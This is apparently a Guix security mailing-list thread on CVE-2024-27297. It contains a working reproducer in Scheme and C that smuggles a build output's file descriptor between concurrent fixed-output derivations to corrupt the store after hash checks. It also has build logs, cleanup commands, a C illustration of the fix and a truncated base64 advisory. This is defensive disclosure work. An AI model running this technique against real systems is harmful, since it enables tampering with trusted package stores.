building /gnu/store/a2xmgshnyqw7dafnmhdsjxr6f1qqa9da-derivation-that-exfiltrates-fd-65f05aca-17261.drv...
building /gnu/store/arw3as4x4i61xg3yvfk9lsa9jcrwlpqb-derivation-that-grabs-fd-65f05aca-17261.drv...
accepting connections...
attempting connection...
preparing our hand...
successfully built /gnu/store/a2xmgshnyqw7dafnmhdsjxr6f1qqa9da-derivation-that-exfiltrates-fd-65f05aca-17261.drv
The following build is still in progress:
  /gnu/store/arw3as4x4i61xg3yvfk9lsa9jcrwlpqb-derivation-that-grabs-fd-65f05aca-17261.drv
swaptrick finished, now to wait..
successfully built /gnu/store/arw3as4x4i61xg3yvfk9lsa9jcrwlpqb-derivation-that-grabs-fd-65f05aca-17261.drv
building /gnu/store/gph10hc3b2ys49sx58l5wjj4ybf81a2l-checking-for-vulnerability.drv...
This depends on /gnu/store/iqggpsrj9i0ydpqpb98iszx1vnbkgr19-derivation-that-grabs-fd-65f05aca-17261, which will grab the file descriptor and corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261.

Here is what we see in /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261: "This file has been corrupted!\n"

We managed to corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261, meaning that YOUR SYSTEM IS VULNERABLE!
builder for `/gnu/store/gph10hc3b2ys49sx58l5wjj4ybf81a2l-checking-for-vulnerability.drv' failed with exit code 1
build of /gnu/store/gph10hc3b2ys49sx58l5wjj4ybf81a2l-checking-for-vulnerability.drv failed
View build log at '/var/log/guix/drvs/gp/h10hc3b2ys49sx58l5wjj4ybf81a2l-checking-for-vulnerability.drv.gz'.
guix build: error: build of `/gnu/store/gph10hc3b2ys49sx58l5wjj4ybf81a2l-checking-for-vulnerability.drv' failed
--8<---------------cut here---------------end--------------->8---

At this point,
/gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261
is corrupt:

--8<---------------cut here---------------start------------->8---
$ cat /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261
This file has been corrupted!
--8<---------------cut here---------------end--------------->8---

You can remove those corrupt test files by running:

  guix gc -D /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd*

You can find corrupt files in your store by running:

  guix gc --verify=contents

This is expensive because it reads every single file under /gnu/store
and checks the hash of each store item against that recorded in
/var/guix/db/db.sqlite. It should flag all the
/gnu/store/…-derivation-that-exfiltrates-fd* outputs.

Ludo’.

Attachment: fixed-output-derivation-corruption.scm (the reproducer)

;; Checking for CVE-2024-27297.
;; Adapted from .

(use-modules (guix)
             (guix modules)
             (guix profiles)
             (gnu packages)
             (gnu packages gnupg)
             (gcrypt hash)
             ((rnrs bytevectors) #:select (string->utf8)))

(define (compiled-c-code name source)
  (define build-profile
    (profile (content (specifications->manifest '("gcc-toolchain")))))

  (define build
    (with-extensions (list guile-gcrypt)
      (with-imported-modules (source-module-closure
                              '((guix build utils)
                                (guix profiles)))
        #~(begin
            (use-modules (guix build utils) (guix profiles))
            (load-profile #+build-profile)
            (system* "gcc" "-Wall" "-g" "-O2" #+source "-o" #$output)))))

  (computed-file name build))

(define sender-source
  (plain-file "sender.c" "
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>

int main(int argc, char **argv) {
  setvbuf(stdout, NULL, _IOLBF, 0);
  int sock = socket(AF_UNIX, SOCK_STREAM, 0);

  // Set up an abstract domain socket path to connect to.
  struct sockaddr_un data;
  data.sun_family = AF_UNIX;
  data.sun_path[0] = 0;
  strcpy(data.sun_path + 1, \"dihutenosa\");

  // Now try to connect.  To ensure we work no matter what order we are
  // executed in, just busyloop here.
  int res = -1;
  while (res < 0) {
    printf(\"attempting connection...\\n\");
    res = connect(sock, (const struct sockaddr *)&data,
                  offsetof(struct sockaddr_un, sun_path)
                  + strlen(\"dihutenosa\") + 1);
    if (res < 0 && errno != ECONNREFUSED) perror(\"connect\");
    if (errno != ECONNREFUSED) break;
    usleep(500000);
  }

  // Write our message header.
  struct msghdr msg = {0};
  msg.msg_control = malloc(128);
  msg.msg_controllen = 128;

  // Write an SCM_RIGHTS message containing the output path.
  struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
  hdr->cmsg_len = CMSG_LEN(sizeof(int));
  hdr->cmsg_level = SOL_SOCKET;
  hdr->cmsg_type = SCM_RIGHTS;

  int fd = open(getenv(\"out\"), O_RDWR | O_CREAT, 0640);
  memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));

  msg.msg_controllen = CMSG_SPACE(sizeof(int));

  // Write a single null byte too.
  msg.msg_iov = malloc(sizeof(struct iovec));
  msg.msg_iov[0].iov_base = \"\";
  msg.msg_iov[0].iov_len = 1;
  msg.msg_iovlen = 1;

  // Send it to the other side of this connection.
  res = sendmsg(sock, &msg, 0);
  if (res < 0) perror(\"sendmsg\");

  int buf;

  // Wait for the server to close the socket, implying that it has
  // received the command.
  recv(sock, (void *)&buf, sizeof(int), 0);
}"))

(define receiver-source
  (mixed-text-file "receiver.c" "
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/inotify.h>
#include <sys/socket.h>
#include <sys/un.h>

int main(int argc, char **argv) {
  int sock = socket(AF_UNIX, SOCK_STREAM, 0);

  // Bind to the socket.
  struct sockaddr_un data;
  data.sun_family = AF_UNIX;
  data.sun_path[0] = 0;
  strcpy(data.sun_path + 1, \"dihutenosa\");
  int res = bind(sock, (const struct sockaddr *)&data,
                 offsetof(struct sockaddr_un, sun_path)
                 + strlen(\"dihutenosa\") + 1);
  if (res < 0) perror(\"bind\");

  res = listen(sock, 1);
  if (res < 0) perror(\"listen\");

  while (1) {
    setvbuf(stdout, NULL, _IOLBF, 0);
    printf(\"accepting connections...\\n\");
    int a = accept(sock, 0, 0);
    if (a < 0) perror(\"accept\");

    struct msghdr msg = {0};
    msg.msg_control = malloc(128);
    msg.msg_controllen = 128;

    // Receive the file descriptor as sent by the smuggler.
    recvmsg(a, &msg, 0);

    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
    while (hdr) {
      if (hdr->cmsg_level == SOL_SOCKET && hdr->cmsg_type == SCM_RIGHTS) {
        int res;

        // Grab the copy of the file descriptor.
        memcpy((void *)&res, CMSG_DATA(hdr), sizeof(int));

        printf(\"preparing our hand...\\n\");

        ftruncate(res, 0);
        // Write the expected contents to the file, tricking Nix
        // into accepting it as matching the fixed-output hash.
        write(res, \"hello, world\\n\", strlen(\"hello, world\\n\"));

        // But wait, the file is bigger than this!  What could
        // this code hide?

        // First, we do a bit of a hack to get a path for the
        // file descriptor we received.  This is necessary because
        // that file doesn't exist in our mount namespace!
        char buf[128];
        sprintf(buf, \"/proc/self/fd/%d\", res);

        // Hook up an inotify on that file, so whenever Nix
        // closes the file, we get notified.
        int inot = inotify_init();
        inotify_add_watch(inot, buf, IN_CLOSE_NOWRITE);

        // Notify the smuggler that we've set everything up for
        // the magic trick we're about to do.
        close(a);

        // So, before we continue with this code, a trip into Nix
        // reveals a small flaw in fixed-output derivations.  When
        // storing their output, Nix has to hash them twice.  Once
        // to verify they match the \"flat\" hash of the derivation
        // and once more after packing the file into the NAR that
        // gets sent to a binary cache for others to consume.  And
        // there's a very slight window in between, where we could
        // just swap the contents of our file.  But the first hash
        // is still noted down, and Nix will refuse to import our
        // NAR file.  To trick it, we need to write a reference to
        // a store path that the source code for the smuggler drv
        // references, to ensure it gets picked up.  Continuing...

        // Wait for the next inotify event to drop:
        read(inot, buf, 128);

        // first read + CA check has just been done, Nix is about
        // to chown the file to root.  afterwards, refscanning
        // happens...

        // Empty the file, seek to start.
        ftruncate(res, 0);
        lseek(res, 0, SEEK_SET);

        // We swap out the contents!
        static const char content[] = \"This file has been corrupted!\\n\";
        write(res, content, strlen(content));
        close(res);

        printf(\"swaptrick finished, now to wait..\\n\");
        return 0;
      }

      hdr = CMSG_NXTHDR(&msg, hdr);
    }

    close(a);
  }
}"))

(define nonce
  (string-append "-" (number->string (car (gettimeofday)) 16)
                 "-" (number->string (getpid))))

(define original-text
  "This is the original text, before corruption.")

(define derivation-that-exfiltrates-fd
  (computed-file (string-append "derivation-that-exfiltrates-fd" nonce)
                 (with-imported-modules '((guix build utils))
                   #~(begin
                       (use-modules (guix build utils))
                       (invoke #+(compiled-c-code "sender" sender-source))
                       (call-with-output-file #$output
                         (lambda (port)
                           (display #$original-text port)))))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256 (string->utf8 original-text)))))

(define derivation-that-grabs-fd
  (computed-file (string-append "derivation-that-grabs-fd" nonce)
                 #~(begin
                     (open-output-file #$output) ;make sure there's an output
                     (execl #+(compiled-c-code "receiver" receiver-source)
                            "receiver"))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256 #vu8()))))

(define check
  (computed-file "checking-for-vulnerability"
                 #~(begin
                     (use-modules (ice-9 textual-ports))

                     (mkdir #$output) ;make sure there's an output
                     (format #t "This depends on ~a, which will grab the file descriptor and corrupt ~a.~%~%"
                             #+derivation-that-grabs-fd
                             #+derivation-that-exfiltrates-fd)
                     (let ((content (call-with-input-file
                                        #+derivation-that-exfiltrates-fd
                                      get-string-all)))
                       (format #t "Here is what we see in ~a: ~s~%~%"
                               #+derivation-that-exfiltrates-fd content)
                       (if (string=? content #$original-text)
                           (format #t "Failed to corrupt ~a, \
your system is safe.~%"
                                   #+derivation-that-exfiltrates-fd)
                           (begin
                             (format #t "We managed to corrupt ~a, \
meaning that YOUR SYSTEM IS VULNERABLE!~%"
                                     #+derivation-that-exfiltrates-fd)
                             (exit 1)))))))

check
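An added illustration, not part of the thread or of the daemon's code, of why the fix works: the daemon copies the output to a pivot and renames the pivot over it, so a writable descriptor that a builder kept open (the one the reproducer passes over SCM_RIGHTS) ends up referring to an unlinked inode and can no longer alter the store path. `detach_output` and `leaked_fd_corrupts` are hypothetical helpers of mine; they operate on a throwaway file under /tmp and never touch /gnu/store.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Copy every byte readable from SRCFD to DSTFD.  Returns 0 or -1. */
static int copy_fd(int srcfd, int dstfd)
{
    char buf[4096];
    ssize_t n;
    while ((n = read(srcfd, buf, sizeof buf)) > 0) {
        ssize_t off = 0;
        while (off < n) {
            ssize_t w = write(dstfd, buf + off, (size_t)(n - off));
            if (w < 0)
                return -1;
            off += w;
        }
    }
    return n < 0 ? -1 : 0;
}

/* The mitigation in miniature (a stand-in for the daemon's
   copyFileRecursively + rename): copy PATH into a freshly created sibling,
   i.e. a new inode, then rename that sibling over PATH.  Any descriptor
   opened on the old inode now points at an unlinked file. */
int detach_output(const char *path)
{
    char pivot[4096];
    struct stat st;

    if (snprintf(pivot, sizeof pivot, "%s.tmp", path) >= (int)sizeof pivot)
        return -1;
    int src = open(path, O_RDONLY);
    if (src < 0)
        return -1;
    if (fstat(src, &st) < 0) {
        close(src);
        return -1;
    }
    /* O_EXCL: refuse to reuse a pivot that somebody else left behind. */
    int dst = open(pivot, O_WRONLY | O_CREAT | O_EXCL, st.st_mode & 07777);
    if (dst < 0) {
        close(src);
        return -1;
    }
    int rc = copy_fd(src, dst);
    close(src);
    close(dst);
    if (rc < 0 || rename(pivot, path) < 0) {
        unlink(pivot);
        return -1;
    }
    return 0;
}

/* Simulate the race on a constructed temp file: a "builder" keeps a
   writable descriptor on its output and rewrites the file through it after
   the "daemon" is done.  With DO_PIVOT non-zero the daemon first runs
   detach_output().  Returns 1 if the path's content was changed through
   the stale descriptor, 0 if it survived intact, -1 on error. */
int leaked_fd_corrupts(int do_pivot)
{
    static const char original[] = "This is the original text.\n";
    static const char corrupted[] = "This file has been corrupted!\n";
    char path[] = "/tmp/fd-escape-demo-XXXXXX";
    char buf[128] = {0};

    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    /* Seed the output, optionally pivot it, then swap contents via FD
       exactly as the reproducer's receiver does (truncate, seek, write). */
    int ok = write(fd, original, strlen(original)) == (ssize_t)strlen(original)
          && (!do_pivot || detach_output(path) == 0)
          && ftruncate(fd, 0) == 0
          && lseek(fd, 0, SEEK_SET) == 0
          && write(fd, corrupted, strlen(corrupted)) == (ssize_t)strlen(corrupted);
    close(fd);
    if (!ok) {
        unlink(path);
        return -1;
    }
    /* What does the path itself contain now? */
    int rfd = open(path, O_RDONLY);
    ssize_t n = rfd < 0 ? -1 : read(rfd, buf, sizeof buf - 1);
    if (rfd >= 0)
        close(rfd);
    unlink(path);
    return n < 0 ? -1 : strcmp(buf, corrupted) == 0;
}

int main(void)
{
    printf("stale fd corrupts output: without pivot=%d, with pivot=%d\n",
           leaked_fd_corrupts(0), leaked_fd_corrupts(1));
    return 0;
}
```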
Date: Tue, 12 Mar 2024 14:35:18 +0000
To: Ludovic Courtès
From: John Kehayias
Subject: Re: Reproducer for the daemon fixed-output derivation vulnerability
Message-ID: <87msr334do.fsf@protonmail.com>
In-Reply-To: <871q8flg17.fsf_-_@gnu.org>
References: <87frwwo1mo.fsf@gnu.org> <871q8flg17.fsf_-_@gnu.org>
Cc: Picnoir, guix-security@gnu.org, Théophane Hufschmitt, 69728@debbugs.gnu.org

Hi all,

On Tue, Mar 12, 2024 at 02:45 PM, Ludovic Courtès wrote:

> As promised, attached is a reproducer that I adapted from the Nix one
> at , which I think was written by puck .
>
> The program demonstrates the vulnerability using two fixed-output
> derivations that must be built concurrently on the same machine.
>

Thanks for the reproducer and instructions. I've included the code and
a brief overview of how to run and what to look for in the updated post
(along with other changes noted privately). The updated post is
attached.

I will have some time here and there over the next few hours to make
changes, but will mostly be away from my Guix machine to handle actually
pushing. So, once it looks good, feel free to do that or I can do it
this evening my time (in about 7-8 hours).

Thanks again Ludo’ for all your work here!

John

Attachment: cve-2024-27297-post.md
YWRpbmcKCkR1ZSB0byB0aGUgc2V2ZXJpdHkgb2YgdGhpcyBzZWN1cml0eSBhZHZpc29yeSwgd2Ug c3Ryb25nbHkgcmVjb21tZW5kCmFsbCB1c2VycyB0byB1cGdyYWRlIHRoZWlyIGBndWl4LWRhZW1v bmAgaW1tZWRpYXRlbHkuCgpGb3IgYSBHdWl4IFN5c3RlbSB0aGUgcHJvY2VkdXJlIGlzIGp1c3Qg cmVjb25maWd1cmluZyB0aGUgc3lzdGVtIGFmdGVyCmEgYGd1aXggcHVsbGAsIGVpdGhlciByZXN0 YXJ0aW5nIGBndWl4LWRhZW1vbmAgb3IgcmVib290aW5nLiBGb3IKZXhhbXBsZSwKCmBgYHNoCmd1 aXggcHVsbApzdWRvIGd1aXggc3lzdGVtIHJlY29uZmlndXJlIC9ydW4vY3VycmVudC1zeXN0ZW0v Y29uZmlndXJhdGlvbi5zY20Kc3VkbyBoZXJkIHJlc3RhcnQgZ3VpeC1kYWVtb24KYGBgCgp3aGVy ZSBgL3J1bi9jdXJyZW50LXN5c3RlbS9jb25maWd1cmF0aW9uLnNjbWAgaXMgdGhlIGN1cnJlbnQg c3lzdGVtCmNvbmZpZ3VyYXRpb24gYnV0IGNvdWxkLCBvZiBjb3Vyc2UsIGJlIHJlcGxhY2VkIGJ5 IGEgc3lzdGVtCmNvbmZpZ3VyYXRpb24gZmlsZSBvZiBhIHVzZXIncyBjaG9pY2UuCgpGb3IgR3Vp eCBydW5uaW5nIGFzIGEgcGFja2FnZSBtYW5hZ2VyIG9uIG90aGVyIGRpc3RyaWJ1dGlvbnMsIG9u ZQpuZWVkcyB0byBgZ3VpeCBwdWxsYCB3aXRoIGBzdWRvYCwgYXMgdGhlIGBndWl4LWRhZW1vbmAg cnVucyBhcyByb290LAphbmQgcmVzdGFydCB0aGUgYGd1aXgtZGFlbW9uYCBzZXJ2aWNlLiBGb3Ig ZXhhbXBsZSwgb24gYSBzeXN0ZW0gdXNpbmcKc3lzdGVtZCB0byBtYW5hZ2Ugc2VydmljZXMsCgpg YGBzaApzdWRvIC0tbG9naW4gZ3VpeCBwdWxsCnN1ZG8gc3lzdGVtY3RsIHJlc3RhcnQgZ3VpeC1k YWVtb24uc2VydmljZQpgYGAKCk5vdGUgdGhhdCBmb3IgdXNlcnMgd2l0aCB0aGVpciBkaXN0cm8n cyBwYWNrYWdlIG9mIEd1aXggKGFzIG9wcG9zZWQgdG8KaGF2aW5nIHVzZWQgdGhlIFtpbnN0YWxs CnNjcmlwdF0oaHR0cHM6Ly9ndWl4LmdudS5vcmcvZW4vbWFudWFsL2RldmVsL2VuL2h0bWxfbm9k ZS9CaW5hcnktSW5zdGFsbGF0aW9uLmh0bWwpKQp5b3UgbWF5IG5lZWQgdG8gdGFrZSBvdGhlciBz dGVwcyBvciB1cGdyYWRlIHRoZSBHdWl4IHBhY2thZ2UgYXMgcGVyCm90aGVyIHBhY2thZ2VzIG9u IHlvdXIgZGlzdHJvLiBQbGVhc2UgY29uc3VsdCB0aGUgcmVsZXZhbnQKZG9jdW1lbnRhdGlvbiBm cm9tIHlvdXIgZGlzdHJvIG9yIGNvbnRhY3QgdGhlIHBhY2thZ2UgbWFpbnRhaW5lciBmb3IKYWRk aXRpb25hbCBpbmZvcm1hdGlvbiBvciBxdWVzdGlvbnMuCgojIENvbmNsdXNpb24KCk9uZSBvZiB0 aGUga2V5IGZlYXR1cmVzIGFuZCBkZXNpZ24gcHJpbmNpcGxlcyBvZiBHTlUgR3VpeCBpcyB0byBh bGxvdwp1bnByaXZpbGVnZWQgcGFja2FnZSBtYW5hZ2VtZW50IHRocm91Z2ggYSBzZWN1cmUgYW5k 
IHJlcHJvZHVjaWJsZQpbYnVpbGQKZW52aXJvbm1lbnRdKGh0dHBzOi8vZ3VpeC5nbnUub3JnL2Vu L21hbnVhbC9kZXZlbC9lbi9odG1sX25vZGUvQnVpbGQtRW52aXJvbm1lbnQtU2V0dXAuaHRtbCku CldoaWxlIGV2ZXJ5IGVmZm9ydCBpcyBtYWRlIHRvIHByb3RlY3QgdGhlIHVzZXIgYW5kIHN5c3Rl bSBmcm9tIGFueQptYWxpY2lvdXMgYWN0b3JzLCBpdCBpcyBhbHdheXMgcG9zc2libGUgdGhhdCB0 aGVyZSBhcmUgZmxhd3MgeWV0IHRvIGJlCmRpc2NvdmVyZWQsIGFzIGhhcyBoYXBwZW5lZCBoZXJl LiBJbiB0aGlzIGNhc2UsIHVzaW5nIHRoZSBpbmdyZWRpZW50cwpvZiBob3cgZmlsZSBkZXNjcmlw dG9ycyBhbmQgVW5peCBzb2NrZXRzIHdvcmsgZXZlbiBpbiB0aGUgaXNvbGF0ZWQKYnVpbGQgZW52 aXJvbm1lbnQgYWxsb3dlZCBmb3IgYSBzZWN1cml0eSB2dWxuZXJhYmlsaXR5IHdpdGggbW9kZXJh dGUKaW1wYWN0LgoKT3VyIHRoYW5rcyB0byBqYWRlIGFuZCBwdWNraXBlZGlhIGZvciB0aGUgb3Jp Z2luYWwgcmVwb3J0LCBhbmQgUGljbm9pcgpmb3IgYnJpbmdpbmcgdGhpcyB0byB0aGUgYXR0ZW50 aW9uIG9mIHRoZSBHTlUgR3VpeCBbc2VjdXJpdHkKdGVhbV0oaHR0cHM6Ly9ndWl4LmdudS5vcmcv ZW4vc2VjdXJpdHkvKS4gQW5kIGEgc3BlY2lhbCB0aGFua3MgdG8KTHVkb3ZpYyBDb3VydMOocyBm b3IgYSBwcm9tcHQgZml4IGFuZCBwcm9vZiBvZiBjb25jZXB0LgoKTm90ZSB0aGF0IHRoZXJlIGFy ZSBjdXJyZW50IGVmZm9ydHMgdG8gcmV3cml0ZSB0aGUgYGd1aXgtZGFlbW9uYCBpbgpHdWlsZSBi eSBDaHJpc3RvcGhlciBCYWluZXMuIEZvciBtb3JlIGluZm9ybWF0aW9uIGFuZCB0aGUgbGF0ZXN0 IG5ld3MKb24gdGhpcyBmcm9udCwgcGxlYXNlIHJlZmVyIHRvIHRoZSBbcmVjZW50IGJsb2cKcG9z dF0oaHR0cHM6Ly9ndWl4LmdudS5vcmcvZW4vYmxvZy8yMDIzL2EtYnVpbGQtZGFlbW9uLWluLWd1 aWxlLykgYW5kClt0aGlzCm1lc3NhZ2VdKGh0dHBzOi8vbGlzdHMuZ251Lm9yZy9hcmNoaXZlL2h0 bWwvZ3VpeC1kZXZlbC8yMDI0LTAyL21zZzAwMjUzLmh0bWwpCm9uIHRoZSBbZ3VpeC1kZXZlbF0o aHR0cHM6Ly9saXN0cy5nbnUub3JnL21haWxtYW4vbGlzdGluZm8vZ3VpeC1kZXZlbCkKbWFpbGlu ZyBsaXN0LgoKIyMgUHJvb2Ygb2YgQ29uY2VwdAoKQmVsb3cgaXMgY29kZSB0byBjaGVjayBpZiBh IGBndWl4LWRhZW1vbmAgaXMgdnVsbmVyYWJsZSB0byB0aGlzCmV4cGxvaXQuIFNhdmUgdGhpcyBm aWxlIGFzIGBmaXhlZC1vdXRwdXQtZGVyaXZhdGlvbi1jb3JydXB0aW9uLnNjbWAKYW5kIHJ1biBm b2xsb3dpbmcgdGhlIGluc3RydWN0aW9ucyBhYm92ZSwgaW4gIk1pdGlnYXRpb24uIiBTb21lCmZ1 cnRoZXIgZGV0YWlscyBhbmQgZXhhbXBsZSBvdXRwdXQgY2FuIGJlIGZvdW5kIG9uIFtpc3N1ZQoj 
Njk3MjhdKGh0dHBzOi8vaXNzdWVzLmd1aXguZ251Lm9yZy82OTcyOCM1KQoKYGBgc2NoZW1lCjs7 IENoZWNraW5nIGZvciBDVkUtMjAyNC0yNzI5Ny4KOzsgQWRhcHRlZCBmcm9tIDxodHRwczovL2hh Y2ttZC5pby8wM1VHZXJld1JjeTNkYjQ0SlFvV3Z3Pi4KCih1c2UtbW9kdWxlcyAoZ3VpeCkKICAg ICAgICAgICAgIChndWl4IG1vZHVsZXMpCiAgICAgICAgICAgICAoZ3VpeCBwcm9maWxlcykKICAg ICAgICAgICAgIChnbnUgcGFja2FnZXMpCiAgICAgICAgICAgICAoZ251IHBhY2thZ2VzIGdudXBn KQogICAgICAgICAgICAgKGdjcnlwdCBoYXNoKQogICAgICAgICAgICAgKChybnJzIGJ5dGV2ZWN0 b3JzKSAjOnNlbGVjdCAoc3RyaW5nLT51dGY4KSkpCgooZGVmaW5lIChjb21waWxlZC1jLWNvZGUg bmFtZSBzb3VyY2UpCiAgKGRlZmluZSBidWlsZC1wcm9maWxlCiAgICAocHJvZmlsZSAoY29udGVu dCAoc3BlY2lmaWNhdGlvbnMtPm1hbmlmZXN0ICcoImdjYy10b29sY2hhaW4iKSkpKSkKCiAgKGRl ZmluZSBidWlsZAogICAgKHdpdGgtZXh0ZW5zaW9ucyAobGlzdCBndWlsZS1nY3J5cHQpCiAgICAg KHdpdGgtaW1wb3J0ZWQtbW9kdWxlcyAoc291cmNlLW1vZHVsZS1jbG9zdXJlICcoKGd1aXggYnVp bGQgdXRpbHMpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgKGd1aXggcHJvZmlsZXMpKSkKICAgICAgICN+KGJlZ2luCiAgICAgICAgICAgKHVzZS1t b2R1bGVzIChndWl4IGJ1aWxkIHV0aWxzKQogICAgICAgICAgICAgICAgICAgICAgICAoZ3VpeCBw cm9maWxlcykpCiAgICAgICAgICAgKGxvYWQtcHJvZmlsZSAjK2J1aWxkLXByb2ZpbGUpCiAgICAg ICAgICAgKHN5c3RlbSogImdjYyIgIi1XYWxsIiAiLWciICItTzIiICMrc291cmNlICItbyIgIyRv dXRwdXQpKSkpKQoKICAoY29tcHV0ZWQtZmlsZSBuYW1lIGJ1aWxkKSkKCihkZWZpbmUgc2VuZGVy LXNvdXJjZQogIChwbGFpbi1maWxlICJzZW5kZXIuYyIgIgogICAgICAjaW5jbHVkZSA8c3lzL3Nv Y2tldC5oPgogICAgICAjaW5jbHVkZSA8c3lzL3VuLmg+CiAgICAgICNpbmNsdWRlIDxzdGRsaWIu aD4KICAgICAgI2luY2x1ZGUgPHN0ZGRlZi5oPgogICAgICAjaW5jbHVkZSA8c3RkaW8uaD4KICAg ICAgI2luY2x1ZGUgPHVuaXN0ZC5oPgogICAgICAjaW5jbHVkZSA8ZmNudGwuaD4KICAgICAgI2lu Y2x1ZGUgPGVycm5vLmg+CgogICAgICBpbnQgbWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpIHsK ICAgICAgICAgIHNldHZidWYoc3Rkb3V0LCBOVUxMLCBfSU9MQkYsIDApOwoKICAgICAgICAgIGlu dCBzb2NrID0gc29ja2V0KEFGX1VOSVgsIFNPQ0tfU1RSRUFNLCAwKTsKCiAgICAgICAgICAvLyBT ZXQgdXAgYW4gYWJzdHJhY3QgZG9tYWluIHNvY2tldCBwYXRoIHRvIGNvbm5lY3QgdG8uCiAgICAg 
ICAgICBzdHJ1Y3Qgc29ja2FkZHJfdW4gZGF0YTsKICAgICAgICAgIGRhdGEuc3VuX2ZhbWlseSA9 IEFGX1VOSVg7CiAgICAgICAgICBkYXRhLnN1bl9wYXRoWzBdID0gMDsKICAgICAgICAgIHN0cmNw eShkYXRhLnN1bl9wYXRoICsgMSwgXCJkaWh1dGVub3NhXCIpOwoKICAgICAgICAgIC8vIE5vdyB0 cnkgdG8gY29ubmVjdCwgVG8gZW5zdXJlIHdlIHdvcmsgbm8gbWF0dGVyIHdoYXQgb3JkZXIgd2Ug YXJlCiAgICAgICAgICAvLyBleGVjdXRlZCBpbiwganVzdCBidXN5bG9vcCBoZXJlLgogICAgICAg ICAgaW50IHJlcyA9IC0xOwogICAgICAgICAgd2hpbGUgKHJlcyA8IDApIHsKICAgICAgICAgICAg ICBwcmludGYoXCJhdHRlbXB0aW5nIGNvbm5lY3Rpb24uLi5cXG5cIik7CiAgICAgICAgICAgICAg cmVzID0gY29ubmVjdChzb2NrLCAoY29uc3Qgc3RydWN0IHNvY2thZGRyICopJmRhdGEsCiAgICAg ICAgICAgICAgICAgIG9mZnNldG9mKHN0cnVjdCBzb2NrYWRkcl91biwgc3VuX3BhdGgpCiAgICAg ICAgICAgICAgICAgICAgKyBzdHJsZW4oXCJkaWh1dGVub3NhXCIpCiAgICAgICAgICAgICAgICAg ICAgKyAxKTsKICAgICAgICAgICAgICBpZiAocmVzIDwgMCAmJiBlcnJubyAhPSBFQ09OTlJFRlVT RUQpIHBlcnJvcihcImNvbm5lY3RcIik7CiAgICAgICAgICAgICAgaWYgKGVycm5vICE9IEVDT05O UkVGVVNFRCkgYnJlYWs7CiAgICAgICAgICAgICAgdXNsZWVwKDUwMDAwMCk7CiAgICAgICAgICB9 CgogICAgICAgICAgLy8gV3JpdGUgb3VyIG1lc3NhZ2UgaGVhZGVyLgogICAgICAgICAgc3RydWN0 IG1zZ2hkciBtc2cgPSB7MH07CiAgICAgICAgICBtc2cubXNnX2NvbnRyb2wgPSBtYWxsb2MoMTI4 KTsKICAgICAgICAgIG1zZy5tc2dfY29udHJvbGxlbiA9IDEyODsKCiAgICAgICAgICAvLyBXcml0 ZSBhbiBTQ01fUklHSFRTIG1lc3NhZ2UgY29udGFpbmluZyB0aGUgb3V0cHV0IHBhdGguCiAgICAg ICAgICBzdHJ1Y3QgY21zZ2hkciAqaGRyID0gQ01TR19GSVJTVEhEUigmbXNnKTsKICAgICAgICAg IGhkci0+Y21zZ19sZW4gPSBDTVNHX0xFTihzaXplb2YoaW50KSk7CiAgICAgICAgICBoZHItPmNt c2dfbGV2ZWwgPSBTT0xfU09DS0VUOwogICAgICAgICAgaGRyLT5jbXNnX3R5cGUgPSBTQ01fUklH SFRTOwogICAgICAgICAgaW50IGZkID0gb3BlbihnZXRlbnYoXCJvdXRcIiksIE9fUkRXUiB8IE9f Q1JFQVQsIDA2NDApOwogICAgICAgICAgbWVtY3B5KENNU0dfREFUQShoZHIpLCAodm9pZCAqKSZm ZCwgc2l6ZW9mKGludCkpOwoKICAgICAgICAgIG1zZy5tc2dfY29udHJvbGxlbiA9IENNU0dfU1BB Q0Uoc2l6ZW9mKGludCkpOwoKICAgICAgICAgIC8vIFdyaXRlIGEgc2luZ2xlIG51bGwgYnl0ZSB0 b28uCiAgICAgICAgICBtc2cubXNnX2lvdiA9IG1hbGxvYyhzaXplb2Yoc3RydWN0IGlvdmVjKSk7 
